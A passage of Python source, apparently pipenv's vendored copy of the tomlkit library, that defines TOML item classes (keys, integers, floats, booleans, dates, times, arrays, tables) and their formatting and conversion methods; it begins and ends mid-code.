None = None, _sort_keys: bool = False) -> Item:\n \"\"\"Create a TOML item from a Python object.\n\n :Example:\n\n >>> item(42)\n 42\n >>> item([1, 2, 3])\n [1, 2, 3]\n >>> item({'a': 1, 'b': 2})\n a = 1\n b = 2\n \"\"\"\n\n from pipenv.vendor.tomlkit.container import Container\n\n if isinstance(value, Item):\n return value\n\n if isinstance(value, bool):\n return Bool(value, Trivia())\n elif isinstance(value, int):\n return Integer(value, Trivia(), str(value))\n elif isinstance(value, float):\n return Float(value, Trivia(), str(value))\n elif isinstance(value, dict):\n table_constructor = (\n InlineTable if isinstance(_parent, (Array, InlineTable)) else Table\n )\n val = table_constructor(Container(), Trivia(), False)\n for k, v in sorted(\n value.items(),\n key=lambda i: (isinstance(i[1], dict), i[0]) if _sort_keys else 1,\n ):\n val[k] = item(v, _parent=val, _sort_keys=_sort_keys)\n\n return val\n elif isinstance(value, (list, tuple)):\n if (\n value\n and all(isinstance(v, dict) for v in value)\n and (_parent is None or isinstance(_parent, Table))\n ):\n a = AoT([])\n table_constructor = Table\n else:\n a = Array([], Trivia())\n table_constructor = InlineTable\n\n for v in value:\n if isinstance(v, dict):\n table = table_constructor(Container(), Trivia(), True)\n\n for k, _v in sorted(\n v.items(),\n key=lambda i: (isinstance(i[1], dict), i[0] if _sort_keys else 1),\n ):\n i = item(_v, _parent=table, _sort_keys=_sort_keys)\n if isinstance(table, InlineTable):\n i.trivia.trail = \"\"\n\n table[k] = i\n\n v = table\n\n a.append(v)\n\n return a\n elif isinstance(value, str):\n return String.from_raw(value)\n elif isinstance(value, datetime):\n return DateTime(\n value.year,\n value.month,\n value.day,\n value.hour,\n value.minute,\n value.second,\n value.microsecond,\n value.tzinfo,\n Trivia(),\n value.isoformat().replace(\"+00:00\", \"Z\"),\n )\n elif isinstance(value, date):\n return Date(value.year, value.month, value.day, Trivia(), value.isoformat())\n elif isinstance(value, time):\n return Time(\n value.hour,\n value.minute,\n value.second,\n value.microsecond,\n value.tzinfo,\n Trivia(),\n value.isoformat(),\n )\n else:\n for encoder in CUSTOM_ENCODERS:\n try:\n rv = encoder(value)\n except TypeError:\n pass\n else:\n if not isinstance(rv, Item):\n raise _ConvertError(\n f\"Custom encoder returned {type(rv)}, not a subclass of Item\"\n )\n return rv\n\n raise _ConvertError(f\"Invalid type {type(value)}\")\n\n\nclass StringType(Enum):\n # Single Line Basic\n SLB = '\"'\n # Multi Line Basic\n MLB = '\"\"\"'\n # Single Line Literal\n SLL = \"'\"\n # Multi Line Literal\n MLL = \"'''\"\n\n @classmethod\n def select(cls, literal=False, multiline=False) -> StringType:\n return {\n (False, False): cls.SLB,\n (False, True): cls.MLB,\n (True, False): cls.SLL,\n (True, True): cls.MLL,\n }[(literal, multiline)]\n\n @property\n def escaped_sequences(self) -> Collection[str]:\n # https://toml.io/en/v1.0.0#string\n escaped_in_basic = CONTROL_CHARS | {\"\\\\\"}\n allowed_in_multiline = {\"\\n\", \"\\r\"}\n return {\n StringType.SLB: escaped_in_basic | {'\"'},\n StringType.MLB: (escaped_in_basic | {'\"\"\"'}) - allowed_in_multiline,\n StringType.SLL: (),\n StringType.MLL: (),\n }[self]\n\n @property\n def invalid_sequences(self) -> Collection[str]:\n # https://toml.io/en/v1.0.0#string\n forbidden_in_literal = CONTROL_CHARS - {\"\\t\"}\n allowed_in_multiline = {\"\\n\", \"\\r\"}\n return {\n StringType.SLB: (),\n StringType.MLB: (),\n StringType.SLL: forbidden_in_literal | {\"'\"},\n StringType.MLL: (forbidden_in_literal | {\"'''\"}) - allowed_in_multiline,\n }[self]\n\n @property\n def unit(self) -> str:\n return self.value[0]\n\n def is_basic(self) -> bool:\n return self in {StringType.SLB, StringType.MLB}\n\n def is_literal(self) -> bool:\n return self in {StringType.SLL, StringType.MLL}\n\n def is_singleline(self) -> bool:\n return self in {StringType.SLB, StringType.SLL}\n\n def is_multiline(self) -> bool:\n return self in {StringType.MLB, StringType.MLL}\n\n def toggle(self) -> StringType:\n return {\n StringType.SLB: StringType.MLB,\n StringType.MLB: StringType.SLB,\n StringType.SLL: StringType.MLL,\n StringType.MLL: StringType.SLL,\n }[self]\n\n\nclass BoolType(Enum):\n TRUE = \"true\"\n FALSE = \"false\"\n\n def __bool__(self):\n return {BoolType.TRUE: True, BoolType.FALSE: False}[self]\n\n def __iter__(self):\n return iter(self.value)\n\n def __len__(self):\n return len(self.value)\n\n\n@dataclasses.dataclass\nclass Trivia:\n \"\"\"\n Trivia information (aka metadata).\n \"\"\"\n\n # Whitespace before a value.\n indent: str = \"\"\n # Whitespace after a value, but before a comment.\n comment_ws: str = \"\"\n # Comment, starting with # character, or empty string if no comment.\n comment: str = \"\"\n # Trailing newline.\n trail: str = \"\\n\"\n\n def copy(self) -> Trivia:\n return dataclasses.replace(self)\n\n\nclass KeyType(Enum):\n \"\"\"\n The type of a Key.\n\n Keys can be bare (unquoted), or quoted using basic (\"), or literal (')\n quotes following the same escaping rules as single-line StringType.\n \"\"\"\n\n Bare = \"\"\n Basic = '\"'\n Literal = \"'\"\n\n\nclass Key(abc.ABC):\n \"\"\"Base class for a key\"\"\"\n\n sep: str\n _original: str\n _keys: list[SingleKey]\n _dotted: bool\n key: str\n\n @abc.abstractmethod\n def __hash__(self) -> int:\n pass\n\n @abc.abstractmethod\n def __eq__(self, __o: object) -> bool:\n pass\n\n def is_dotted(self) -> bool:\n \"\"\"If the key is followed by other keys\"\"\"\n return self._dotted\n\n def __iter__(self) -> Iterator[SingleKey]:\n return iter(self._keys)\n\n def concat(self, other: Key) -> DottedKey:\n \"\"\"Concatenate keys into a dotted key\"\"\"\n keys = self._keys + other._keys\n return DottedKey(keys, sep=self.sep)\n\n def is_multi(self) -> bool:\n \"\"\"Check if the key contains multiple keys\"\"\"\n return len(self._keys) > 1\n\n def as_string(self) -> str:\n \"\"\"The TOML representation\"\"\"\n return self._original\n\n def __str__(self) -> str:\n return self.as_string()\n\n def __repr__(self) -> str:\n return f\"\"\n\n\nclass SingleKey(Key):\n \"\"\"A single key\"\"\"\n\n def __init__(\n self,\n k: str,\n t: KeyType | None = None,\n sep: str | None = None,\n original: str | None = None,\n ) -> None:\n if t is None:\n if not k or any(\n c not in string.ascii_letters + string.digits + \"-\" + \"_\" for c in k\n ):\n t = KeyType.Basic\n else:\n t = KeyType.Bare\n\n self.t = t\n if sep is None:\n sep = \" = \"\n\n self.sep = sep\n self.key = k\n if original is None:\n key_str = escape_string(k) if t == KeyType.Basic else k\n original = f\"{t.value}{key_str}{t.value}\"\n\n self._original = original\n self._keys = [self]\n self._dotted = False\n\n @property\n def delimiter(self) -> str:\n \"\"\"The delimiter: double quote/single quote/none\"\"\"\n return self.t.value\n\n def is_bare(self) -> bool:\n \"\"\"Check if the key is bare\"\"\"\n return self.t == KeyType.Bare\n\n def __hash__(self) -> int:\n return hash(self.key)\n\n def __eq__(self, other: Any) -> bool:\n if isinstance(other, Key):\n return isinstance(other, SingleKey) and self.key == other.key\n\n return self.key == other\n\n\nclass DottedKey(Key):\n def __init__(\n self,\n keys: Iterable[SingleKey],\n sep: str | None = None,\n original: str | None = None,\n ) -> None:\n self._keys = list(keys)\n if original is None:\n original = \".\".join(k.as_string() for k in self._keys)\n\n self.sep = \" = \" if sep is None else sep\n self._original = original\n self._dotted = False\n self.key = \".\".join(k.key for k in self._keys)\n\n def __hash__(self) -> int:\n return hash(tuple(self._keys))\n\n def __eq__(self, __o: object) -> bool:\n return isinstance(__o, DottedKey) and self._keys == __o._keys\n\n\nclass Item:\n \"\"\"\n An item within a TOML document.\n \"\"\"\n\n def __init__(self, trivia: Trivia) -> None:\n self._trivia = trivia\n\n @property\n def trivia(self) -> Trivia:\n \"\"\"The trivia element associated with this item\"\"\"\n return self._trivia\n\n @property\n def discriminant(self) -> int:\n raise NotImplementedError()\n\n def as_string(self) -> str:\n \"\"\"The TOML representation\"\"\"\n raise NotImplementedError()\n\n @property\n def value(self) -> Any:\n return self\n\n def unwrap(self) -> Any:\n \"\"\"Returns as pure python object (ppo)\"\"\"\n raise NotImplementedError()\n\n # Helpers\n\n def comment(self, comment: str) -> Item:\n \"\"\"Attach a comment to this item\"\"\"\n if not comment.strip().startswith(\"#\"):\n comment = \"# \" + comment\n\n self._trivia.comment_ws = \" \"\n self._trivia.comment = comment\n\n return self\n\n def indent(self, indent: int) -> Item:\n \"\"\"Indent this item with given number of spaces\"\"\"\n if self._trivia.indent.startswith(\"\\n\"):\n self._trivia.indent = \"\\n\" + \" \" * indent\n else:\n self._trivia.indent = \" \" * indent\n\n return self\n\n def is_boolean(self) -> bool:\n return isinstance(self, Bool)\n\n def is_table(self) -> bool:\n return isinstance(self, Table)\n\n def is_inline_table(self) -> bool:\n return isinstance(self, InlineTable)\n\n def is_aot(self) -> bool:\n return isinstance(self, AoT)\n\n def _getstate(self, protocol=3):\n return (self._trivia,)\n\n def __reduce__(self):\n return self.__reduce_ex__(2)\n\n def __reduce_ex__(self, protocol):\n return self.__class__, self._getstate(protocol)\n\n\nclass Whitespace(Item):\n \"\"\"\n A whitespace literal.\n \"\"\"\n\n def __init__(self, s: str, fixed: bool = False) -> None:\n self._s = s\n self._fixed = fixed\n\n @property\n def s(self) -> str:\n return self._s\n\n @property\n def value(self) -> str:\n \"\"\"The wrapped string of the whitespace\"\"\"\n return self._s\n\n @property\n def trivia(self) -> Trivia:\n raise RuntimeError(\"Called trivia on a Whitespace variant.\")\n\n @property\n def discriminant(self) -> int:\n return 0\n\n def is_fixed(self) -> bool:\n \"\"\"If the whitespace is fixed, it can't be merged or discarded from the output.\"\"\"\n return self._fixed\n\n def as_string(self) -> str:\n return self._s\n\n def __repr__(self) -> str:\n return f\"<{self.__class__.__name__} {repr(self._s)}>\"\n\n def _getstate(self, protocol=3):\n return self._s, self._fixed\n\n\nclass Comment(Item):\n \"\"\"\n A comment literal.\n \"\"\"\n\n @property\n def discriminant(self) -> int:\n return 1\n\n def as_string(self) -> str:\n return (\n f\"{self._trivia.indent}{decode(self._trivia.comment)}{self._trivia.trail}\"\n )\n\n def __str__(self) -> str:\n return f\"{self._trivia.indent}{decode(self._trivia.comment)}\"\n\n\nclass Integer(Item, _CustomInt):\n \"\"\"\n An integer literal.\n \"\"\"\n\n def __new__(cls, value: int, trivia: Trivia, raw: str) -> Integer:\n return int.__new__(cls, value)\n\n def __init__(self, value: int, trivia: Trivia, raw: str) -> None:\n super().__init__(trivia)\n self._original = value\n self._raw = raw\n self._sign = False\n\n if re.match(r\"^[+\\-]\\d+$\", raw):\n self._sign = True\n\n def unwrap(self) -> int:\n return self._original\n\n __int__ = unwrap\n\n def __hash__(self) -> int:\n return hash(self.unwrap())\n\n @property\n def discriminant(self) -> int:\n return 2\n\n @property\n def value(self) -> int:\n \"\"\"The wrapped integer value\"\"\"\n return self\n\n def as_string(self) -> str:\n return self._raw\n\n def _new(self, result):\n raw = str(result)\n if self._sign:\n sign = \"+\" if result >= 0 else \"-\"\n raw = sign + raw\n\n return Integer(result, self._trivia, raw)\n\n def _getstate(self, protocol=3):\n return int(self), self._trivia, self._raw\n\n # int methods\n __abs__ = wrap_method(int.__abs__)\n __add__ = wrap_method(int.__add__)\n __and__ = wrap_method(int.__and__)\n __ceil__ = wrap_method(int.__ceil__)\n __eq__ = int.__eq__\n __floor__ = wrap_method(int.__floor__)\n __floordiv__ = wrap_method(int.__floordiv__)\n __invert__ = wrap_method(int.__invert__)\n __le__ = int.__le__\n __lshift__ = wrap_method(int.__lshift__)\n __lt__ = int.__lt__\n __mod__ = wrap_method(int.__mod__)\n __mul__ = wrap_method(int.__mul__)\n __neg__ = wrap_method(int.__neg__)\n __or__ = wrap_method(int.__or__)\n __pos__ = wrap_method(int.__pos__)\n __pow__ = wrap_method(int.__pow__)\n __radd__ = wrap_method(int.__radd__)\n __rand__ = wrap_method(int.__rand__)\n __rfloordiv__ = wrap_method(int.__rfloordiv__)\n __rlshift__ = wrap_method(int.__rlshift__)\n __rmod__ = wrap_method(int.__rmod__)\n __rmul__ = wrap_method(int.__rmul__)\n __ror__ = wrap_method(int.__ror__)\n __round__ = wrap_method(int.__round__)\n __rpow__ = wrap_method(int.__rpow__)\n __rrshift__ = wrap_method(int.__rrshift__)\n __rshift__ = wrap_method(int.__rshift__)\n __rtruediv__ = wrap_method(int.__rtruediv__)\n __rxor__ = wrap_method(int.__rxor__)\n __truediv__ = wrap_method(int.__truediv__)\n __trunc__ = wrap_method(int.__trunc__)\n __xor__ = wrap_method(int.__xor__)\n\n\nclass Float(Item, _CustomFloat):\n \"\"\"\n A float literal.\n \"\"\"\n\n def __new__(cls, value: float, trivia: Trivia, raw: str) -> Float:\n return float.__new__(cls, value)\n\n def __init__(self, value: float, trivia: Trivia, raw: str) -> None:\n super().__init__(trivia)\n self._original = value\n self._raw = raw\n self._sign = False\n\n if re.match(r\"^[+\\-].+$\", raw):\n self._sign = True\n\n def unwrap(self) -> float:\n return self._original\n\n __float__ = unwrap\n\n def __hash__(self) -> int:\n return hash(self.unwrap())\n\n @property\n def discriminant(self) -> int:\n return 3\n\n @property\n def value(self) -> float:\n \"\"\"The wrapped float value\"\"\"\n return self\n\n def as_string(self) -> str:\n return self._raw\n\n def _new(self, result):\n raw = str(result)\n\n if self._sign:\n sign = \"+\" if result >= 0 else \"-\"\n raw = sign + raw\n\n return Float(result, self._trivia, raw)\n\n def _getstate(self, protocol=3):\n return float(self), self._trivia, self._raw\n\n # float methods\n __abs__ = wrap_method(float.__abs__)\n __add__ = wrap_method(float.__add__)\n __eq__ = float.__eq__\n __floordiv__ = wrap_method(float.__floordiv__)\n __le__ = float.__le__\n __lt__ = float.__lt__\n __mod__ = wrap_method(float.__mod__)\n __mul__ = wrap_method(float.__mul__)\n __neg__ = wrap_method(float.__neg__)\n __pos__ = wrap_method(float.__pos__)\n __pow__ = wrap_method(float.__pow__)\n __radd__ = wrap_method(float.__radd__)\n __rfloordiv__ = wrap_method(float.__rfloordiv__)\n __rmod__ = wrap_method(float.__rmod__)\n __rmul__ = wrap_method(float.__rmul__)\n __round__ = wrap_method(float.__round__)\n __rpow__ = wrap_method(float.__rpow__)\n __rtruediv__ = wrap_method(float.__rtruediv__)\n __truediv__ = wrap_method(float.__truediv__)\n __trunc__ = float.__trunc__\n\n if sys.version_info >= (3, 9):\n __ceil__ = float.__ceil__\n __floor__ = float.__floor__\n else:\n __ceil__ = math.ceil\n __floor__ = math.floor\n\n\nclass Bool(Item):\n \"\"\"\n A boolean literal.\n \"\"\"\n\n def __init__(self, t: int, trivia: Trivia) -> None:\n super().__init__(trivia)\n\n self._value = bool(t)\n\n def unwrap(self) -> bool:\n return bool(self)\n\n @property\n def discriminant(self) -> int:\n return 4\n\n @property\n def value(self) -> bool:\n \"\"\"The wrapped boolean value\"\"\"\n return self._value\n\n def as_string(self) -> str:\n return str(self._value).lower()\n\n def _getstate(self, protocol=3):\n return self._value, self._trivia\n\n def __bool__(self):\n return self._value\n\n __nonzero__ = __bool__\n\n def __eq__(self, other):\n if not isinstance(other, bool):\n return NotImplemented\n\n return other == self._value\n\n def __hash__(self):\n return hash(self._value)\n\n def __repr__(self):\n return repr(self._value)\n\n\nclass DateTime(Item, datetime):\n \"\"\"\n A datetime literal.\n \"\"\"\n\n def __new__(\n cls,\n year: int,\n month: int,\n day: int,\n hour: int,\n minute: int,\n second: int,\n microsecond: int,\n tzinfo: tzinfo | None,\n *_: Any,\n **kwargs: Any,\n ) -> datetime:\n return datetime.__new__(\n cls,\n year,\n month,\n day,\n hour,\n minute,\n second,\n microsecond,\n tzinfo=tzinfo,\n **kwargs,\n )\n\n def __init__(\n self,\n year: int,\n month: int,\n day: int,\n hour: int,\n minute: int,\n second: int,\n microsecond: int,\n tzinfo: tzinfo | None,\n trivia: Trivia | None = None,\n raw: str | None = None,\n **kwargs: Any,\n ) -> None:\n super().__init__(trivia or Trivia())\n\n self._raw = raw or self.isoformat()\n\n def unwrap(self) -> datetime:\n (\n year,\n month,\n day,\n hour,\n minute,\n second,\n microsecond,\n tzinfo,\n _,\n _,\n ) = self._getstate()\n return datetime(year, month, day, hour, minute, second, microsecond, tzinfo)\n\n @property\n def discriminant(self) -> int:\n return 5\n\n @property\n def value(self) -> datetime:\n return self\n\n def as_string(self) -> str:\n return self._raw\n\n def __add__(self, other):\n if PY38:\n result = datetime(\n self.year,\n self.month,\n self.day,\n self.hour,\n self.minute,\n self.second,\n self.microsecond,\n self.tzinfo,\n ).__add__(other)\n else:\n result = super().__add__(other)\n\n return self._new(result)\n\n def __sub__(self, other):\n if PY38:\n result = datetime(\n self.year,\n self.month,\n self.day,\n self.hour,\n self.minute,\n self.second,\n self.microsecond,\n self.tzinfo,\n ).__sub__(other)\n else:\n result = super().__sub__(other)\n\n if isinstance(result, datetime):\n result = self._new(result)\n\n return result\n\n def replace(self, *args: Any, **kwargs: Any) -> datetime:\n return self._new(super().replace(*args, **kwargs))\n\n def astimezone(self, tz: tzinfo) -> datetime:\n result = super().astimezone(tz)\n if PY38:\n return result\n return self._new(result)\n\n def _new(self, result) -> DateTime:\n raw = result.isoformat()\n\n return DateTime(\n result.year,\n result.month,\n result.day,\n result.hour,\n result.minute,\n result.second,\n result.microsecond,\n result.tzinfo,\n self._trivia,\n raw,\n )\n\n def _getstate(self, protocol=3):\n return (\n self.year,\n self.month,\n self.day,\n self.hour,\n self.minute,\n self.second,\n self.microsecond,\n self.tzinfo,\n self._trivia,\n self._raw,\n )\n\n\nclass Date(Item, date):\n \"\"\"\n A date literal.\n \"\"\"\n\n def __new__(cls, year: int, month: int, day: int, *_: Any) -> date:\n return date.__new__(cls, year, month, day)\n\n def __init__(\n self, year: int, month: int, day: int, trivia: Trivia, raw: str\n ) -> None:\n super().__init__(trivia)\n\n self._raw = raw\n\n def unwrap(self) -> date:\n (year, month, day, _, _) = self._getstate()\n return date(year, month, day)\n\n @property\n def discriminant(self) -> int:\n return 6\n\n @property\n def value(self) -> date:\n return self\n\n def as_string(self) -> str:\n return self._raw\n\n def __add__(self, other):\n if PY38:\n result = date(self.year, self.month, self.day).__add__(other)\n else:\n result = super().__add__(other)\n\n return self._new(result)\n\n def __sub__(self, other):\n if PY38:\n result = date(self.year, self.month, self.day).__sub__(other)\n else:\n result = super().__sub__(other)\n\n if isinstance(result, date):\n result = self._new(result)\n\n return result\n\n def replace(self, *args: Any, **kwargs: Any) -> date:\n return self._new(super().replace(*args, **kwargs))\n\n def _new(self, result):\n raw = result.isoformat()\n\n return Date(result.year, result.month, result.day, self._trivia, raw)\n\n def _getstate(self, protocol=3):\n return (self.year, self.month, self.day, self._trivia, self._raw)\n\n\nclass Time(Item, time):\n \"\"\"\n A time literal.\n \"\"\"\n\n def __new__(\n cls,\n hour: int,\n minute: int,\n second: int,\n microsecond: int,\n tzinfo: tzinfo | None,\n *_: Any,\n ) -> time:\n return time.__new__(cls, hour, minute, second, microsecond, tzinfo)\n\n def __init__(\n self,\n hour: int,\n minute: int,\n second: int,\n microsecond: int,\n tzinfo: tzinfo | None,\n trivia: Trivia,\n raw: str,\n ) -> None:\n super().__init__(trivia)\n\n self._raw = raw\n\n def unwrap(self) -> time:\n (hour, minute, second, microsecond, tzinfo, _, _) = self._getstate()\n return time(hour, minute, second, microsecond, tzinfo)\n\n @property\n def discriminant(self) -> int:\n return 7\n\n @property\n def value(self) -> time:\n return self\n\n def as_string(self) -> str:\n return self._raw\n\n def replace(self, *args: Any, **kwargs: Any) -> time:\n return self._new(super().replace(*args, **kwargs))\n\n def _new(self, result):\n raw = result.isoformat()\n\n return Time(\n result.hour,\n result.minute,\n result.second,\n result.microsecond,\n result.tzinfo,\n self._trivia,\n raw,\n )\n\n def _getstate(self, protocol: int = 3) -> tuple:\n return (\n self.hour,\n self.minute,\n self.second,\n self.microsecond,\n self.tzinfo,\n self._trivia,\n self._raw,\n )\n\n\nclass _ArrayItemGroup:\n __slots__ = (\"value\", \"indent\", \"comma\", \"comment\")\n\n def __init__(\n self,\n value: Item | None = None,\n indent: Whitespace | None = None,\n comma: Whitespace | None = None,\n comment: Comment | None = None,\n ) -> None:\n self.value = value\n self.indent = indent\n self.comma = comma\n self.comment = comment\n\n def __iter__(self) -> Iterator[Item]:\n return filter(\n lambda x: x is not None, (self.indent, self.value, self.comma, self.comment)\n )\n\n def __repr__(self) -> str:\n return repr(tuple(self))\n\n def is_whitespace(self) -> bool:\n return self.value is None and self.comment is None\n\n def __bool__(self) -> bool:\n try:\n next(iter(self))\n except StopIteration:\n return False\n return True\n\n\nclass Array(Item, _CustomList):\n \"\"\"\n An array literal\n \"\"\"\n\n def __init__(\n self, value: list[Item], trivia: Trivia, multiline: bool = False\n ) -> None:\n super().__init__(trivia)\n list.__init__(\n self,\n [v for v in value if not isinstance(v, (Whitespace, Comment, Null))],\n )\n self._index_map: dict[int, int] = {}\n self._value = self._group_values(value)\n self._multiline = multiline\n self._reindex()\n\n def _group_values(self, value: list[Item]) -> list[_ArrayItemGroup]:\n \"\"\"Group the values into (indent, value, comma, comment) tuples\"\"\"\n groups = []\n this_group = _ArrayItemGroup()\n for item in value:\n if isinstance(item, Whitespace):\n if \",\" not in item.s:\n groups.append(this_group)\n this_group = _ArrayItemGroup(indent=item)\n else:\n if this_group.value is None:\n # when comma is met and no value is provided, add a dummy Null\n this_group.value = Null()\n this_group.comma = item\n elif isinstance(item, Comment):\n if this_group.value is None:\n this_group.value = Null()\n this_group.comment = item\n elif this_group.value is None:\n this_group.value = item\n else:\n groups.append(this_group)\n this_group = _ArrayItemGroup(value=item)\n groups.append(this_group)\n return [group for group in groups if group]\n\n def unwrap(self) -> list[Any]:\n unwrapped = []\n for v in self:\n if hasattr(v, \"unwrap\"):\n unwrapped.append(v.unwrap())\n else:\n unwrapped.append(v)\n return unwrapped\n\n @property\n def discriminant(self) -> int:\n return 8\n\n @property\n def value(self) -> list:\n return self\n\n def _iter_items(self) -> Iterator[Item]:\n for v in self._value:\n yield from v\n\n def multiline(self, multiline: bool) -> Array:\n \"\"\"Change the array to display in multiline or not.\n\n :Example:\n\n >>> a = item([1, 2, 3])\n >>> print(a.as_string())\n [1, 2, 3]\n >>> print(a.multiline(True).as_string())\n [\n 1,\n 2,\n 3,\n ]\n \"\"\"\n self._multiline = multiline\n\n return self\n\n def as_string(self) -> str:\n if not self._multiline or not self._value:\n return f'[{\"\".join(v.as_string() for v in self._iter_items())}]'\n\n s = \"[\\n\"\n s += \"\".join(\n self.trivia.indent\n + \" \" * 4\n + v.value.as_string()\n + (\",\" if not isinstance(v.value, Null) else \"\")\n + (v.comment.as_string() if v.comment is not None else \"\")\n + \"\\n\"\n for v in self._value\n if v.value is not None\n )\n s += self.trivia.indent + \"]\"\n\n return s\n\n def _reindex(self) -> None:\n self._index_map.clear()\n index = 0\n for i, v in enumerate(self._value):\n if v.value is None or isinstance(v.value, Null):\n continue\n self._index_map[index] = i\n index += 1\n\n def add_line(\n self,\n *items: Any,\n indent: str = \" \",\n comment: str | None = None,\n add_comma: bool = True,\n newline: bool = True,\n ) -> None:\n \"\"\"Add multiple items in a line to control the format precisely.\n When add_comma is True, only accept actual values and\n \", \" will be added between values automatically.\n\n :Example:\n\n >>> a = array()\n >>> a.add_line(1, 2, 3)\n >>> a.add_line(4, 5, 6)\n >>> a.add_line(indent=\"\")\n >>> print(a.as_string())\n [\n 1, 2, 3,\n 4, 5, 6,\n ]\n \"\"\"\n new_values: list[Item] = []\n first_indent = f\"\\n{indent}\" if newline else indent\n if first_indent:\n new_values.append(Whitespace(first_indent))\n whitespace = \"\"\n data_values = []\n for i, el in enumerate(items):\n it = item(el, _parent=self)\n if isinstance(it, Comment) or add_comma and isinstance(el, Whitespace):\n raise ValueError(f\"item type {type(it)} is not allowed in add_line\")\n if not isinstance(it, Whitespace):\n if whitespace:\n new_values.append(Whitespace(whitespace))\n whitespace = \"\"\n new_values.append(it)\n data_values.append(it.value)\n if add_comma:\n new_values.append(Whitespace(\",\"))\n if i != len(items) - 1:\n new_values.append(Whitespace(\" \"))\n elif \",\" not in it.s:\n whitespace += it.s\n else:\n new_values.append(it)\n if whitespace:\n new_values.append(Whitespace(whitespace))\n if comment:\n indent = \" \" if items else \"\"\n new_values.append(\n Comment(Trivia(indent=indent, comment=f\"# {comment}\", trail=\"\"))\n )\n list.extend(self, data_values)\n if len(self._value) > 0:\n last_item = self._value[-1]\n last_value_item = next(\n (\n v\n for v in self._value[::-1]\n if v.value is not None and not isinstance(v.value, Null)\n ),\n None,\n )\n if last_value_item is not None:\n last_value_item.comma = Whitespace(\",\")\n if last_item.is_whitespace():\n self._value[-1:-1] = self._group_values(new_values)\n else:\n self._value.extend(self._group_values(new_values))\n else:\n self._value.extend(self._group_values(new_values))\n self._reindex()\n\n def clear(self) -> None:\n \"\"\"Clear the array.\"\"\"\n list.clear(self)\n self._index_map.clear()\n self._value.clear()\n\n def __len__(self) -> int:\n return list.__len__(self)\n\n def __getitem__(self, key: int | slice) -> Any:\n rv = cast(Item, list.__getitem__(self, key))\n if rv.is_boolean():\n return bool(rv)\n return rv\n\n def __setitem__(self, key: int | slice, value: Any) -> Any:\n it = item(value, _parent=self)\n list.__setitem__(self, key, it)\n if isinstance(key, slice):\n raise ValueError(\"slice assignment is not supported\")\n if key < 0:\n key += len(self)\n self._value[self._index_map[key]].value = it\n\n def insert(self, pos: int, value: Any) -> None:\n it = item(value, _parent=self)\n length = len(self)\n if not isinstance(it, (Comment, Whitespace)):\n list.insert(self, pos, it)\n if pos < 0:\n pos += length\n if pos < 0:\n pos = 0\n\n idx = 0 # insert position of the self._value list\n default_indent = \" \"\n if pos < length:\n try:\n idx = self._index_map[pos]\n except KeyError as e:\n raise IndexError(\"list index out of range\") from e\n else:\n idx = len(self._value)\n if idx >= 1 and self._value[idx - 1].is_whitespace():\n # The last item is a pure whitespace(\\n ), insert before it\n idx -= 1\n if (\n self._value[idx].indent is not None\n and \"\\n\" in self._value[idx].indent.s\n ):\n default_indent = \"\\n \"\n indent: Item | None = None\n comma: Item | None = Whitespace(\",\") if pos < length else None\n if idx < len(self._value) and not self._value[idx].is_whitespace():\n # Prefer to copy the indentation from the item after\n indent = self._value[idx].indent\n if idx > 0:\n last_item = self._value[idx - 1]\n if indent is None:\n indent = last_item.indent\n if not isinstance(last_item.value, Null) and \"\\n\" in default_indent:\n # Copy the comma from the last item if 1) it contains a value and\n # 2) the array is multiline\n comma = last_item.comma\n if last_item.comma is None and not isinstance(last_item.value, Null):\n # Add comma to the last item to separate it from the following items.\n last_item.comma = Whitespace(\",\")\n if indent is None and (idx > 0 or \"\\n\" in default_indent):\n # apply default indent if it isn't the first item or the array is multiline.\n indent = Whitespace(default_indent)\n new_item = _ArrayItemGroup(value=it, indent=indent, comma=comma)\n self._value.insert(idx, new_item)\n self._reindex()\n\n def __delitem__(self, key: int | slice):\n length = len(self)\n list.__delitem__(self, key)\n\n if isinstance(key, slice):\n indices_to_remove = list(\n range(key.start or 0, key.stop or length, key.step or 1)\n )\n else:\n indices_to_remove = [length + key if key < 0 else key]\n for i in sorted(indices_to_remove, reverse=True):\n try:\n idx = self._index_map[i]\n except KeyError as e:\n if not isinstance(key, slice):\n raise IndexError(\"list index out of range\") from e\n else:\n del self._value[idx]\n if (\n idx == 0\n and len(self._value) > 0\n and \"\\n\" not in self._value[idx].indent.s\n ):\n # Remove the indentation of the first item if not newline\n self._value[idx].indent = None\n if len(self._value) > 0:\n v = self._value[-1]\n if not v.is_whitespace():\n # remove the comma of the last item\n v.comma = None\n\n self._reindex()\n\n def _getstate(self, protocol=3):\n return list(self._iter_items()), self._trivia, self._multiline\n\n\nclass AbstractTable(Item, _CustomDict):\n \"\"\"Common behaviour of both :class:`Table` and :class:`InlineTable`\"\"\"\n\n def __init__(self, value: container.Container, trivia: Trivia):\n Item.__init__(self, trivia)\n\n self._value = value\n\n for k, v in self._value.body:\n if k is not None:\n dict.__setitem__(self, k.key, v)\n\n def unwrap(self) -> dict[str, Any]:\n unwrapped = {}\n for k, v in self.items():\n if isinstance(k, Key):\n k = k.key\n if hasattr(v, \"unwrap\"):\n v = v.unwrap()\n unwrapped[k] = v\n\n return unwrapped\n\n @property\n def value(self) -> container.Container:\n return self._value\n\n @overload\n def append(self: AT, key: None, value: Comment | Whitespace) -> AT:\n ...\n\n @overload\n def append(self: AT, key: Key | str, value: Any) -> AT:\n ...\n\n def append(self, key, value):\n raise NotImplementedError\n\n @overload\n def add(self: AT, key: Comment | Whitespace) -> AT:\n ...\n\n @overload\n def add(self: AT, key: Key | str, value: Any = ...) -> AT:\n ...\n\n def add(self, key, value=None):\n if value is None:\n if not isinstance(key, (Comment, Whitespace)):\n msg = \"Non comment/whitespace items must have an associated key\"\n raise ValueError(msg)\n\n key, value = None, key\n\n return self.append(key, value)\n\n def remove(self: AT, key: Key | str) -> AT:\n self._value.remove(key)\n\n if isinstance(key, Key):\n key = key.key\n\n if key is not None:\n dict.__delitem__(self, key)\n\n return self\n\n def setdefault(self, key: Key | str, default: Any) -> Any:\n super().setdefault(key, default)\n return self[key]\n\n def __str__(self):\n return str(self.value)\n\n def copy(self: AT) -> AT:\n return copy.copy(self)\n\n def __repr__(self) -> str:\n return repr(self.value)\n\n def __iter__(self) -> Iterator[str]:\n return iter(self._value)\n\n def __len__(self) -> int:\n return len(self._value)\n\n def __delitem__(self, key: Key | str) -> None:\n self.remove(key)\n\n def __getitem__(self, key: Key | str) -> Item:\n return cast(Item, self._value[key])\n\n def __setitem__(self, key: Key | str, value: Any) -> None:\n if not isinstance(value, Item):\n value = item(value, _parent=self)\n\n is_replace = key in self\n self._value[key] = value\n\n if key is not None:\n dict.__setitem__(self, key, value)\n\n if is_replace:\n return\n m = re.match(\"(?s)^[^ ]*([ 